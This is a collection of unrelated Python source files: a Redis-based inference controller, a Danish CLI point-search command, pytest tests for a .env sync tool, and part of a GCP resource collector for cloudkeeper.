run_in_thread that I'm not totally sure what it does self.subThread = pubsub.run_in_thread() self.metrics = common.Metrics(self.db, common.MODEL_STAT_PREFIX, ["requests_submitted", "requests_completed", "open_requests"], ["requests_submitted"]) print("Controller Initialized.") ###################### ## Worker Functions ## ###################### def addWorker(self, worker_url): logging.info("local_controller: addWorker start") logging.info(f"Adding worker: {worker_url}") worker_url = common.fixWorkerURL(worker_url) if worker_url in self.workers_by_url.keys() and self.workers_by_url[worker_url] is not None: logging.warn(f"Already added worker @ '{worker_url}'") return new_worker = abstractions.WorkerAbstraction(worker_url) # TODO: Add error checking for the new worker. 
Check to see if it is active for instance # TODO: Get list of models in the repo on the new worker self.workers_by_url[worker_url] = new_worker logging.info("local_controller: addWorker end") def delWorker(self, worker_url): logging.debug("delWorker start") logging.debug(f"Deling worker: {worker_url}") #self.workers_by_url[worker_url].removeWorker() del self.workers_by_url[worker_url] ###################### ##################### ## Model Functions ## ##################### def getModelByName(self, model_name): try: model = self.models_by_name[model_name] except KeyError: model = abstractions.ModelAbstraction(model_name) self.models_by_name[model_name] = model return model def loadModelOntoWorker(self, model_name, worker_url): logging.info("loadModelOntoWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].loadModel(model): self.model_placements.addModelToWorker(worker_url, model.model_name) else: logging.error(f"Failed to load model '{model.model_name}' to worker @ {worker_url}") def unloadModelFromWorker(self, model_name, worker_url): logging.info("unloadModelFromWorker() start") worker_url = common.fixWorkerURL(worker_url) model = self.getModelByName(model_name) if self.workers_by_url[worker_url].unloadModel(model): self.model_placements.removeModelFromWorker(worker_url, model.model_name) else: logging.error(f"Failed to unload model '{model.model_name}' to worker @ {worker_url}") ##################### ######################### ## Statistic Functions ## def recordRequestEntry(self, model_requested): self.metrics.incrementMetricBy("requests_submitted", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, +1) def recordRequestExit(self, model_requested): self.metrics.incrementMetricBy("requests_completed", model_requested) self.metrics.incrementMetricBy("open_requests", model_requested, -1) ######################### ######################### ## Inventory Functions ## ######################### def updateWorkerList(self, message=None): logging.debug("updateWorkerList start") orig_message = message message = orig_message["data"].decode() if message not in ["sadd", "srem"]: logging.error(f"Unknown message received: {message}") logging.error(f"Full message: {orig_message}") return logging.debug("Acquiring workers_lock") try: with self.workers_lock: redis_worker_urls = list(map( (lambda b: common.fixWorkerURL(b.decode())), self.db.smembers(f'{common.WORKER_URL_KEY}'))) if message == "sadd" or message is None: # Workers were added worker_urls_add = list(set(redis_worker_urls) - set(self.workers_by_url.keys())) for worker_url in worker_urls_add: self.addWorker(worker_url) elif message == "srem" or message == "del": # Workers were removed worker_urls_del = list(set(self.workers_by_url.keys()) - set(redis_worker_urls)) for worker_url in worker_urls_del: self.delWorker(worker_url) finally: logging.debug("Releasing workers_lock") def updateModelPlacement(self, message): logging.debug("updateModelPlacement start") orig_message = message message = orig_message["data"].decode() channel = orig_message["channel"].decode() if message not in ["sadd", "srem"]: logging.warn(f"Unknown message received: {message}") logging.warn(f"Full message: {orig_message}") return model_name = channel.replace(f"{common.KEYSPACE_PREFIX}{common.MODEL_PLACEMENT_PREFIX}","") logging.info(f"Update for model: {message} {model_name}") try: redis_model_placements = list(map( (lambda b: common.fixWorkerURL(b.decode())), 
self.db.smembers(f"{common.MODEL_PLACEMENT_PREFIX}{model_name}"))) current_placements = self.model_placements.getWorkersFromModel(model_name) logging.info(f"redis_model_placements: {redis_model_placements}") logging.info(f"current_placements: {current_placements}") logging.debug("Acquiring model lock") with self.model_lock: if message == "sadd": placements_to_add = list(set(redis_model_placements) - set(current_placements)) for worker_url in placements_to_add: logging.info(f"Adding {model_name} to {worker_url}") self.loadModelOntoWorker(model_name, worker_url) elif message == "srem": placements_to_del = list(set(current_placements) - set(redis_model_placements)) for worker_url in placements_to_del: logging.debug(f"Del'ing {model_name} from {worker_url}") self.unloadModelFromWorker(model_name, worker_url) finally: logging.debug("Releasing model lock") ######################### @common.timing def infer(self, inference_request): logging.info(f"infer({inference_request.model_name})") self.recordRequestEntry(inference_request.model_name) logging.info(f"inference_request: {inference_request}") model = self.getModelByName(inference_request.model_name) accepted_by_worker = False while not accepted_by_worker: while len(model.placements) == 0: self.requestModelPlacement(inference_request) if not model.is_available.wait(common.PLACEMENT_POLL_INTERVAL): logging.warning(f"Waiting on placement for {model}") if len(model.placements) > 0: worker = random.choice(list(model.placements)) accepted_by_worker = worker.infer(inference_request) else: logging.warning("Worker picked already reassigned, requests are coming in too fast?") if not inference_request.complete.wait(common.TIMEOUT_IN_SECONDS): raise exceptions.InferenceFailedException("Inference Failed to respond") logging.info(f"inference request after inference: {inference_request}") self.recordRequestExit(inference_request.model_name) logging.info(f"response: {inference_request}") #.getResponse()}") return inference_request.getResponse() @common.gather_info def requestModelPlacement(self, inference_request): logging.info(f"requestModelPlacement({inference_request.model_name})") # In case oracle is being used self.db.set(f"latest_request_id", f"{inference_request.id}") # Request model placement results = self.db.sadd(f"{common.PLACEMENT_REQUEST_KEY}", f"{inference_request.model_name}") if results >= 1: # If this is the first time this model has been requested inference_request.markModelMiss() if __name__ == '__main__': common.getLogger(f"{os.path.basename(__file__).replace('.py', '')}") local_controller = LocalController() while True: time.sleep(0.001)
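

# ---------------------------------------------------------------------------
# Hedged companion sketch (not part of the controller above): illustrates the
# Redis writes that the controller's pub/sub handlers react to. The handlers
# listen on keyspace-notification channels, so the Redis server is assumed to
# have notifications enabled (e.g. `CONFIG SET notify-keyspace-events KEA`).
# The worker URL and model name below are made-up placeholders; the key names
# come from the `common` module imported above.
# ---------------------------------------------------------------------------
def example_register_worker_and_placement(
    db, worker_url="http://worker-0:8000", model_name="resnet50"
):
    """Sketch of the producer side that updateWorkerList()/updateModelPlacement()
    consume; kept separate from the controller logic above."""
    # SADD on the shared worker set emits the 'sadd' keyspace event that
    # updateWorkerList() handles, which in turn calls addWorker().
    db.sadd(common.WORKER_URL_KEY, worker_url)
    # SADD on the per-model placement set emits the 'sadd' event that
    # updateModelPlacement() handles, causing loadModelOntoWorker() to run.
    db.sadd(f"{common.MODEL_PLACEMENT_PREFIX}{model_name}", worker_url)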
import re import sys import click from sqlalchemy.orm.exc import NoResultFound import fire.cli from fire.cli.utils import klargør_ident_til_søgning from . import søg @søg.command() @fire.cli.default_options() @click.argument("ident") @click.option( "-n", "--antal", default=20, type=int, help="Begræns antallet af fundne søgeresultater", ) def punkt(ident: str, antal: int, **kwargs): """ Søg efter et punkt ud fra dets ident Søgeudtryk kan præciseres med wildcards givet ved %. Hvis ingen wildcards angives søges automatisk efter "%IDENT%". Der skælnes ikke mellem små og store bogstaver. Antallet af søgeresultater begrænses som standard til 20. """ ident = klargør_ident_til_søgning(ident) if "%" not in ident: ident = f"%{ident}%" ident_pattern = ident.replace("%", ".*") try: punkter = fire.cli.firedb.soeg_punkter(ident, antal) except NoResultFound: fire.cli.print( f"Fejl: Kunne ikke finde {ident.replace('%', '')}.", fg="red", err=True ) sys.exit(1) for punkt in punkter: for ident in punkt.identer: if re.match(ident_pattern, ident): fire.cli.print(f"{ident:20}", bold=True, fg="green", nl=False) else: fire.cli.print(f"{ident:20}", nl=False) fire.cli.print(nl=True)
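

# ---------------------------------------------------------------------------
# Hedged illustration (not part of the command above): the wildcard handling
# in punkt() wraps a bare ident in "%...%" and maps the SQL-style "%" wildcard
# to the regex ".*" that is used to highlight matching idents. The ident
# strings in the comments below are made-up examples.
# ---------------------------------------------------------------------------
def _wildcard_til_regex(ident: str) -> str:
    """Mirror of the pattern-building step in punkt(), for illustration only."""
    if "%" not in ident:
        ident = f"%{ident}%"  # no wildcard given: search for the substring
    return ident.replace("%", ".*")  # SQL-style wildcard -> regex

# _wildcard_til_regex("K-63")   -> ".*K-63.*"  (matches idents containing "K-63")
# _wildcard_til_regex("K-63-%") -> "K-63-.*"   (matches idents starting with "K-63-")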
import glob import os import emoji import pytest from click.testing import CliRunner from py_sync_dotenv.cli import formatting_engine, main test_env = """ PRODUCTION=1 DEBUG=0 SECRET_KEY=iu0^cv$mghjfa_vp8vk)e(c_5^cfo7staccjs4+!f#=1a_22-h2 DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1] """ @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): s_source = source.split(" ")[1] if source else ".env" with open(f"{s_source}", "w") as f: f.write(test_env) if dev_env: with open(f"{dev_env.split(' ')[1]}", "a") as f: pass if dev_envs: if not os.path.exists(dev_envs.split(" ")[1]): os.makedirs(dev_envs.split(" ")[1]) with open(f"{dev_envs.split(' ')[1]}/.env.dev", "a") as f: pass with open(f"{dev_envs.split(' ')[1]}/.env1.dev", "a") as f: pass args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert not result.exception assert result.output == ( f"{emoji.emojize(':loudspeaker: Synchronizing your .env file(s) :loudspeaker:')}" + f"\n{emoji.emojize(':fire: Synchronizing Complete :fire:', use_aliases=True)}\n" ) if dev_env: with open(f"{dev_env.split(' ')[1]}", "r") as f: output = f.read() if just_variables: assert output == "\n".join(formatting_engine(test_env.split("\n"))) else: assert output == test_env if dev_envs: for filename in glob.glob( os.path.join(dev_envs.split(" ")[1], ".env*"), recursive=False ): with open(f"{filename}", "r") as f: output = f.read() if just_variables: assert output == "\n".join( formatting_engine(test_env.split("\n")) ) else: assert output == test_env @pytest.mark.parametrize( "source, dev_env, dev_envs, just_variables", [ ("", "", "", ""), ("-s .env", "", "", ""), ("-s .env", "-d .env.dev", "", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", ""), ("-s .env", "-d .env.dev", "-ds dev_envs/", "--just-variables"), ], ) def test_standard_sync_invalid_path(source, dev_env, dev_envs, just_variables): runner = CliRunner() with runner.isolated_filesystem(): args = f"{source} {dev_env} {dev_envs} {just_variables}" result = runner.invoke(main, args=args) assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_source_file(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-s .env") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_dev_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ds dev_envs/") assert result.exception assert result.exit_code == 2 def test_standard_sync_invlaid_prod_envs_dir(): runner = CliRunner() with runner.isolated_filesystem(): result = runner.invoke(main, "-ps prod_envs/") assert result.exception assert result.exit_code == 2
import cklib.logging import socket from pprint import pformat from retrying import retry from typing import Callable, List, Dict, Type, Union from cklib.baseresources import BaseResource from cklib.graph import Graph from cklib.args import ArgumentParser from cklib.utils import except_log_and_pass from prometheus_client import Summary from .resources import ( GCPProject, GCPQuota, GCPRegion, GCPZone, GCPDiskType, GCPDisk, GCPInstance, GCPMachineType, GCPNetwork, GCPSubnetwork, GCPTargetVPNGateway, GCPVPNGateway, GCPVPNTunnel, GCPRouter, GCPRoute, GCPSecurityPolicy, GCPSnapshot, GCPSSLCertificate, GCPNetworkEndpointGroup, GCPGlobalNetworkEndpointGroup, GCPInstanceGroup, GCPInstanceGroupManager, GCPAutoscaler, GCPHealthCheck, GCPHTTPHealthCheck, GCPHTTPSHealthCheck, GCPUrlMap, GCPTargetPool, GCPTargetHttpProxy, GCPTargetHttpsProxy, GCPTargetSslProxy, GCPTargetTcpProxy, GCPTargetGrpcProxy, GCPTargetInstance, GCPBackendService, GCPForwardingRule, GCPGlobalForwardingRule, GCPBucket, GCPDatabase, GCPService, GCPServiceSKU, GCPInstanceTemplate, ) from .utils import ( Credentials, gcp_client, gcp_resource, paginate, iso2datetime, get_result_data, common_resource_kwargs, retry_on_error, ) log = cklib.logging.getLogger("cloudkeeper." + __name__) metrics_collect_regions = Summary( "cloudkeeper_plugin_gcp_collect_regions_seconds", "Time it took the collect_regions() method", ) metrics_collect_zones = Summary( "cloudkeeper_plugin_gcp_collect_zones_seconds", "Time it took the collect_zones() method", ) metrics_collect_disks = Summary( "cloudkeeper_plugin_gcp_collect_disks_seconds", "Time it took the collect_disks() method", ) metrics_collect_instances = Summary( "cloudkeeper_plugin_gcp_collect_instances_seconds", "Time it took the collect_instances() method", ) metrics_collect_disk_types = Summary( "cloudkeeper_plugin_gcp_collect_disk_types_seconds", "Time it took the collect_disk_types() method", ) metrics_collect_networks = Summary( "cloudkeeper_plugin_gcp_collect_networks_seconds", "Time it took the collect_networks() method", ) metrics_collect_subnetworks = Summary( "cloudkeeper_plugin_gcp_collect_subnetworks_seconds", "Time it took the collect_subnetworks() method", ) metrics_collect_vpn_tunnels = Summary( "cloudkeeper_plugin_gcp_collect_vpn_tunnels_seconds", "Time it took the collect_vpn_tunnels() method", ) metrics_collect_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_vpn_gateways_seconds", "Time it took the collect_vpn_gateways() method", ) metrics_collect_target_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_target_vpn_gateways_seconds", "Time it took the collect_target_vpn_gateways() method", ) metrics_collect_routers = Summary( "cloudkeeper_plugin_gcp_collect_routers_seconds", "Time it took the collect_routers() method", ) metrics_collect_routes = Summary( "cloudkeeper_plugin_gcp_collect_routes_seconds", "Time it took the collect_routes() method", ) metrics_collect_security_policies = Summary( "cloudkeeper_plugin_gcp_collect_security_policies_seconds", "Time it took the collect_security_policies() method", ) metrics_collect_snapshots = Summary( "cloudkeeper_plugin_gcp_collect_snapshots_seconds", "Time it took the collect_snapshots() method", ) metrics_collect_ssl_certificates = Summary( "cloudkeeper_plugin_gcp_collect_ssl_certificates_seconds", "Time it took the collect_ssl_certificates() method", ) metrics_collect_machine_types = Summary( "cloudkeeper_plugin_gcp_collect_machine_types_seconds", "Time it took the collect_machine_types() method", ) 
metrics_collect_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_network_endpoint_groups_seconds", "Time it took the collect_network_endpoint_groups() method", ) metrics_collect_global_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_global_network_endpoint_groups_seconds", "Time it took the collect_global_network_endpoint_groups() method", ) metrics_collect_instance_groups = Summary( "cloudkeeper_plugin_gcp_collect_instance_groups_seconds", "Time it took the collect_instance_groups() method", ) metrics_collect_instance_group_managers = Summary( "cloudkeeper_plugin_gcp_collect_instance_group_managers_seconds", "Time it took the collect_instance_group_managers() method", ) metrics_collect_autoscalers = Summary( "cloudkeeper_plugin_gcp_collect_autoscalers_seconds", "Time it took the collect_autoscalers() method", ) metrics_collect_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_health_checks_seconds", "Time it took the collect_health_checks() method", ) metrics_collect_http_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_http_health_checks_seconds", "Time it took the collect_http_health_checks() method", ) metrics_collect_https_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_https_health_checks_seconds", "Time it took the collect_https_health_checks() method", ) metrics_collect_url_maps = Summary( "cloudkeeper_plugin_gcp_collect_url_maps_seconds", "Time it took the collect_url_maps() method", ) metrics_collect_target_pools = Summary( "cloudkeeper_plugin_gcp_collect_target_pools_seconds", "Time it took the collect_target_pools() method", ) metrics_collect_target_instances = Summary( "cloudkeeper_plugin_gcp_collect_target_instances_seconds", "Time it took the collect_target_instances() method", ) metrics_collect_target_http_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_http_proxies_seconds", "Time it took the collect_target_http_proxies() method", ) metrics_collect_target_https_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_https_proxies_seconds", "Time it took the collect_target_https_proxies() method", ) metrics_collect_target_ssl_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_ssl_proxies_seconds", "Time it took the collect_target_ssl_proxies() method", ) metrics_collect_target_tcp_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_tcp_proxies_seconds", "Time it took the collect_target_tcp_proxies() method", ) metrics_collect_target_grpc_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_grpc_proxies_seconds", "Time it took the collect_target_grpc_proxies() method", ) metrics_collect_backend_services = Summary( "cloudkeeper_plugin_gcp_collect_backend_services_seconds", "Time it took the collect_backend_services() method", ) metrics_collect_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_forwarding_rules_seconds", "Time it took the collect_forwarding_rules() method", ) metrics_collect_global_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_global_forwarding_rules_seconds", "Time it took the collect_global_forwarding_rules() method", ) metrics_collect_buckets = Summary( "cloudkeeper_plugin_gcp_collect_buckets_seconds", "Time it took the collect_buckets() method", ) metrics_collect_databases = Summary( "cloudkeeper_plugin_gcp_collect_databases_seconds", "Time it took the collect_databases() method", ) metrics_collect_services = Summary( "cloudkeeper_plugin_gcp_collect_services_seconds", "Time it took the collect_services() method", ) 
metrics_collect_instance_templates = Summary( "cloudkeeper_plugin_gcp_collect_instance_templates_seconds", "Time it took the collect_instance_templates() method", ) class GCPProjectCollector: """Collects a single GCP project. Responsible for collecting all the resources of an individual project. Builds up its own local graph which is then taken by collect_project() and merged with the plugin graph. This way we can have many instances of GCPProjectCollector running in parallel. All building up individual graphs which in the end are merged to a final graph containing all GCP resources. """ def __init__(self, project: GCPProject) -> None: """ Args: project: The GCP project resource object this project collector is going to collect. """ self.project = project self.credentials = Credentials.get(self.project.id) self.graph = Graph(root=self.project) # Mandatory collectors are always collected regardless of whether # they were included by --gcp-collect or excluded by --gcp-no-collect self.mandatory_collectors = { "regions": self.collect_regions, "zones": self.collect_zones, } # Global collectors are resources that are either specified on a global level # as opposed to a per zone or per region level or they are zone/region # resources that provide a aggregatedList() function returning all resources # for all zones/regions. self.global_collectors = { "services": self.collect_services, "networks": self.collect_networks, "subnetworks": self.collect_subnetworks, "routers": self.collect_routers, "routes": self.collect_routes, "health_checks": self.collect_health_checks, "http_health_checks": self.collect_http_health_checks, "https_health_checks": self.collect_https_health_checks, "machine_types": self.collect_machine_types, "instances": self.collect_instances, "disk_types": self.collect_disk_types, "disks": self.collect_disks, "target_vpn_gateways": self.collect_target_vpn_gateways, "vpn_gateways": self.collect_vpn_gateways, "vpn_tunnels": self.collect_vpn_tunnels, "security_policies": self.collect_security_policies, "snapshots": self.collect_snapshots, "ssl_certificates": self.collect_ssl_certificates, "network_endpoint_groups": self.collect_network_endpoint_groups, "instance_groups": self.collect_instance_groups, "instance_group_managers": self.collect_instance_group_managers, "autoscalers": self.collect_autoscalers, "backend_services": self.collect_backend_services, "url_maps": self.collect_url_maps, "target_pools": self.collect_target_pools, "target_instances": self.collect_target_instances, "target_http_proxies": self.collect_target_http_proxies, "target_https_proxies": self.collect_target_https_proxies, "target_ssl_proxies": self.collect_target_ssl_proxies, "target_tcp_proxies": self.collect_target_tcp_proxies, "target_grpc_proxies": self.collect_target_grpc_proxies, "forwarding_rules": self.collect_forwarding_rules, "buckets": self.collect_buckets, "databases": self.collect_databases, "instance_templates": self.collect_instance_templates, } # Region collectors collect resources in a single region. # They are being passed the GCPRegion resource object as `region` arg. self.region_collectors = {} # Zone collectors are being called for each zone. # They are being passed the GCPZone resource object as `zone` arg. 
        self.zone_collectors = {}

        self.all_collectors = dict(self.mandatory_collectors)
        self.all_collectors.update(self.global_collectors)
        self.all_collectors.update(self.region_collectors)
        self.all_collectors.update(self.zone_collectors)
        self.collector_set = set(self.all_collectors.keys())

    @retry(
        stop_max_attempt_number=10,
        wait_exponential_multiplier=3000,
        wait_exponential_max=300000,
        retry_on_exception=retry_on_error,
    )
    def collect(self) -> None:
        """Runs the actual resource collection across all resource collectors.

        Resource collectors add their resources to the local `self.graph` graph.
        """
        self.graph = Graph(root=self.project)
        collectors = set(self.collector_set)
        if len(ArgumentParser.args.gcp_collect) > 0:
            collectors = set(ArgumentParser.args.gcp_collect).intersection(collectors)
        if len(ArgumentParser.args.gcp_no_collect) > 0:
            collectors = collectors - set(ArgumentParser.args.gcp_no_collect)
        collectors = collectors.union(set(self.mandatory_collectors.keys()))

        log.debug(
            (
                f"Running the following collectors in {self.project.rtdname}:"
                f" {', '.join(collectors)}"
            )
        )

        for collector_name, collector in self.mandatory_collectors.items():
            if collector_name in collectors:
                log.info(f"Collecting {collector_name} in {self.project.rtdname}")
                collector()

        regions = [r for r in self.graph.nodes if isinstance(r, GCPRegion)]
        zones = [z for z in self.graph.nodes if isinstance(z, GCPZone)]

        log.debug(f"Found {len(zones)} zones in {len(regions)} regions")

        for collector_name, collector in self.global_collectors.items():
            if collector_name in collectors:
                log.info(f"Collecting {collector_name} in {self.project.rtdname}")
                collector()

        # Todo: parallelize region and zone collection
        for region in regions:
            for collector_name, collector in self.region_collectors.items():
                if collector_name in collectors:
                    log.info(
                        (
                            f"Collecting {collector_name} in {region.rtdname}"
                            f" {self.project.rtdname}"
                        )
                    )
                    collector(region=region)

        for zone in zones:
            for collector_name, collector in self.zone_collectors.items():
                if collector_name in collectors:
                    log.info(
                        (
                            f"Collecting {collector_name} in {zone.rtdname}"
                            f" {self.project.rtdname}"
                        )
                    )
                    collector(zone=zone)

    def default_attributes(
        self, result: Dict, attr_map: Dict = None, search_map: Dict = None
    ) -> Dict:
        """Finds resource attributes in the GCP API result data and returns
        them together with any graph search results.

        Args:
            result: Dict containing the result of a GCP API execute() call.
            attr_map: Dict of map_to: map_from pairs where map_to is the name of the
                arg that a Cloudkeeper resource expects and map_from is the name of
                the key in the result dictionary.
            search_map: Dict of map_to: [search_attr, search_value_name]. Where map_to
                is the arg that a Cloudkeeper resource expects. search_attr is the
                attribute name to search for in the graph and search_value_name is
                the name of the key in the result dictionary that is passed into the
                graph search as attribute value.
Example: result: ``` { 'creationTimestamp': '2020-10-08T05:45:43.294-07:00', 'id': '7684174949783877401', 'kind': 'compute#disk', 'labelFingerprint': '42WmSpB8rSM=', 'lastAttachTimestamp': '2020-10-08T05:45:43.294-07:00', 'name': 'instance-group-1-lnmq', 'physicalBlockSizeBytes': '4096', 'sizeGb': '10', 'status': 'READY', 'selfLink': 'https://www.googleapis.com/.../disks/instance-1-lnmq', 'type': 'https://www.googleapis.com/.../diskTypes/pd-standard', 'users': ['https://www.googleapis.com/.../instances/instance-1-lnmq'], 'zone': 'https://www.googleapis.com/.../zones/europe-west1-d' } attr_map: { "volume_size": "sizeGb", "volume_status": "status", } search_map: { "volume_type": ["link", "type"], "__users": ["link", "users"], } ``` This would create GCPDisk( identifier="7684174949783877401", name="instance-group-1-lnmq", ctime=iso2datetime("2020-10-08T05:45:43.294-07:00"), volume_size="10", volume_status="READY", volume_type=GCPDiskType() link="https://www.googleapis.com/.../disks/instance-1-lnmq" ) Where the GCPDiskType() object would be one that was found in the graph with attribute "link": https://www.googleapis.com/.../diskTypes/pd-standard The map_from and search_value_name in attr_map and search_map respectively can also be a callable which is passed the entire result dict and then responsible for finding and returning the relevant data. E.g. the entry from above: "volume_size": "sizeGb", could also be written as: "volume_size": (lambda r: r.get("sizeGb")), This is mainly useful for searching deeply nested data. Any key in the search_map that starts with an underscore like _users in the example above will only be looked up and if found added to the search_results return value but not be added to kwargs. This returned search data can then be used to draw predecessor and successor edges in the graph. 
""" # The following are default attributes that are passed to every # BaseResource() if found in `result` kwargs = { "id": result.get("id", result.get("name", result.get("selfLink"))), "tags": result.get("labels", {}), "name": result.get("name"), "ctime": iso2datetime(result.get("creationTimestamp")), "link": result.get("selfLink"), "label_fingerprint": result.get("labelFingerprint"), "_account": self.project, } if attr_map is not None: for map_to, map_from in attr_map.items(): data = get_result_data(result, map_from) if data is None: log.debug(f"Attribute {map_from} not in result") continue log.debug(f"Found attribute {map_to}: {pformat(data)}") kwargs[map_to] = data # By default we search for a resources region and/or zone default_search_map = {"_region": ["link", "region"], "_zone": ["link", "zone"]} search_results = {} if search_map is None: search_map = dict(default_search_map) else: updated_search_map = dict(default_search_map) updated_search_map.update(search_map) search_map = updated_search_map for map_to, search_data in search_map.items(): search_attr = search_data[0] search_value_name = search_data[1] search_value = get_result_data(result, search_value_name) if search_value is None: continue if isinstance(search_value, List): search_values = search_value else: search_values = [search_value] for search_value in search_values: search_result = self.graph.search_first(search_attr, search_value) if search_result: if map_to not in search_results: search_results[map_to] = [] search_results[map_to].append(search_result) if ( map_to not in kwargs and map_to in search_results and not str(map_to).startswith("__") ): search_result = search_results[map_to] if len(search_result) == 1: kwargs[map_to] = search_result[0] else: kwargs[map_to] = list(search_result) # If the resource was referencing a zone but not a region we look up its # region based on the zone information we found. # E.g. if we know a disk is in zone us-central1-a then we can find # the region us-central1 from that. if ( "_zone" in kwargs and "_region" not in kwargs and isinstance(kwargs["_zone"], BaseResource) ): region = kwargs["_zone"].region(self.graph) if region: kwargs["_region"] = region if "_region" in search_map.keys() and "_region" not in search_results: search_results["_region"] = region return kwargs, search_results @except_log_and_pass(do_raise=socket.timeout) def collect_something( self, resource_class: Type[BaseResource], paginate_method_name: str = "list", paginate_items_name: str = "items", parent_resource: Union[BaseResource, str] = None, attr_map: Dict = None, search_map: Dict = None, successors: List = None, predecessors: List = None, client_kwargs: Dict = None, resource_kwargs: Dict = None, paginate_subitems_name: str = None, post_process: Callable = None, dump_resource: bool = False, ) -> List: """Collects some resource and adds it to the graph. Args: resource_class: A GCP resource class name that inherits Cloudkeeper's BaseResource paginate_method_name: usually "list" or "aggregatedList" paginate_items_name: key name that contains all the items of our list/aggregatedList request parent_resource: The resources parent resource in the graph. This defaults to the zone or region for local or the project for global resources. attr_map: Dict containing a mapping of GCP API result dict keys to resource_class attributes. See default_attributes() for a detailed description. 
search_map: Dict containing a mapping similar to attr_map except that any results get looked up in `self.graph` instead of just passing the result data as an attribute. successors: List of resource successors (child nodes) predecessors: List of resource predecessors (parent nodes) client_kwargs: **kwargs that get passed to the GCP client resource_kwargs: **kwargs that get passed to the GCP resource paginate_subitems_name: Name of a resource in a aggregatedList result set Defaults to be the name as the client method name. E.g. if we request all disks it'll be {"items": {'zones/...': {'disks': []}} post_process: Callable that is called after a resource has been added to the graph. The resource object and the graph are given as args. dump_resource: If True will log.debug() a dump of the API result. """ client_method_name = resource_class("", {})._client_method default_resource_args = resource_class("", {}).resource_args log.debug(f"Collecting {client_method_name}") if paginate_subitems_name is None: paginate_subitems_name = client_method_name if client_kwargs is None: client_kwargs = {} if resource_kwargs is None: resource_kwargs = {} if successors is None: successors = [] if predecessors is None: predecessors = [] parent_map = {True: predecessors, False: successors} if "project" in default_resource_args: resource_kwargs["project"] = self.project.id client = gcp_client( resource_class.client, resource_class.api_version, credentials=self.credentials, **client_kwargs, ) gcp_resource = getattr(client, client_method_name) if not callable(gcp_resource): raise RuntimeError(f"No method {client_method_name} on client {client}") for resource in paginate( gcp_resource=gcp_resource(), method_name=paginate_method_name, items_name=paginate_items_name, subitems_name=paginate_subitems_name, **resource_kwargs, ): kwargs, search_results = self.default_attributes( resource, attr_map=attr_map, search_map=search_map ) r = resource_class(**kwargs) pr = parent_resource log.debug(f"Adding {r.rtdname} to the graph") if dump_resource: log.debug(f"Resource Dump: {pformat(resource)}") if isinstance(pr, str) and pr in search_results: pr = search_results[parent_resource][0] log.debug(f"Parent resource for {r.rtdname} set to {pr.rtdname}") if not isinstance(pr, BaseResource): pr = kwargs.get("_zone", kwargs.get("_region", self.graph.root)) log.debug( f"Parent resource for {r.rtdname} automatically set to {pr.rtdname}" ) self.graph.add_resource(pr, r) for is_parent, sr_names in parent_map.items(): for sr_name in sr_names: if sr_name in search_results: srs = search_results[sr_name] for sr in srs: if is_parent: src = sr dst = r else: src = r dst = sr self.graph.add_edge(src, dst) else: if sr_name in search_map: graph_search = search_map[sr_name] attr = graph_search[0] value_name = graph_search[1] if value_name in resource: value = resource[value_name] if isinstance(value, List): values = value for value in values: r.add_deferred_connection( attr, value, is_parent ) elif isinstance(value, str): r.add_deferred_connection(attr, value, is_parent) else: log.error( ( "Unable to add deferred connection for" f" value {value} of type {type(value)}" ) ) else: log.error(f"Key {sr_name} is missing in search_map") if callable(post_process): post_process(r, self.graph) # All of the following methods just call collect_something() with some resource # specific options. 
@metrics_collect_regions.time() def collect_regions(self) -> List: def post_process(resource: GCPRegion, graph: Graph): for quota in resource._quotas: if set(["metric", "limit", "usage"]) == set(quota.keys()): q = GCPQuota( quota["metric"], {}, quota=quota["limit"], usage=quota["usage"], _region=resource.region(), _account=resource.account(), _zone=resource.zone(), ctime=resource.ctime, ) graph.add_resource(resource, q) resource._quotas = None self.collect_something( resource_class=GCPRegion, attr_map={"region_status": "status", "quotas": "quotas"}, post_process=post_process, ) @metrics_collect_zones.time() def collect_zones(self) -> List: self.collect_something( resource_class=GCPZone, ) @metrics_collect_disks.time() def collect_disks(self): def volume_status(result): status = result.get("status") num_users = len(result.get("users", [])) if num_users == 0 and status == "READY": status = "AVAILABLE" return status self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDisk, search_map={ "volume_type": ["link", "type"], "__users": ["link", "users"], }, attr_map={ "volume_size": (lambda r: int(r.get("sizeGb"))), "volume_status": volume_status, "last_attach_timestamp": ( lambda r: iso2datetime( r.get("lastAttachTimestamp", r["creationTimestamp"]) ) ), "last_detach_timestamp": ( lambda r: iso2datetime( r.get("lastDetachTimestamp", r["creationTimestamp"]) ) ), }, predecessors=["volume_type"], successors=["__users"], ) @metrics_collect_instances.time() def collect_instances(self): def post_process(resource: GCPInstance, graph: Graph): """Post process instance resources The first time we encounter a custom machine type we will fetch its details. This is because the machineTypes API's list/aggregatedList functions only return predefined machine types. Custom ones have to be fetched individually when we encounter them on a instance. Once added to the graph Cloudkeeper will find it for successive instances of the same machine type. 
